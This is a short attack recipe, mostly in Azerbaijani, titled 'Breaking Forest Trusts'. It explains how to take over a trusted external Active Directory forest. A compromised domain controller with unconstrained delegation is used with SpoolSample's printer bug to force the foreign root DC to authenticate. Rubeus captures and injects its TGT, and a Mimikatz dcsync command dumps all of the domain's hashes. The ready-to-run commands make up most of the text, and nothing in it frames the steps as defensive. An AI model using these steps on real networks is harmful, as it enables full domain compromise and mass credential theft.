Breaking Forest Trusts

TL;DR Xarici forest ilə iki istiqamətli etibarımız varsa və biz məhdudiyyətsiz nümayəndə heyətini aktivləşdirən yerli forest maşına güzəştə getməyi bacarırıqsa (DC-lər defolt olaraq buna malikdir), biz xarici foresint root domeninin DC-ni məcbur etmək üçün printerbugdan istifadə edə bilərik. bizə doğrulayın. Sonra biz onun TGT-ni tuta, yaddaşa yeridə və onun hashlərini atmaq üçün DCsync-ə daxil edə, bütün meşəyə tam giriş imkanı verə bilərik.

Bunun üçün bir çox aləti eyni anda istifadə edəmək lazımdır:

• Rubeus

• SpoolSample

• Mimikatz

#Rubeus ilə TGT-lərin monitorinqinə başlayın:
Rubeus.exe monitor /interval:5 /filteruser:target-dc$

#Maşınımıza hədəf DC-nin məcburi autentifikasiyasını işə salmaq üçün printer səhvini yerinə yetirin
SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local

#Rubeus-dan alınan base64 TGT-ni alın və yaddaşa yeridin:
Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>

#Mimikatz istifadə edərək hədəf domenin hashlərini əldə edin:
lsadump::dcsync /domain:external.forest.local /all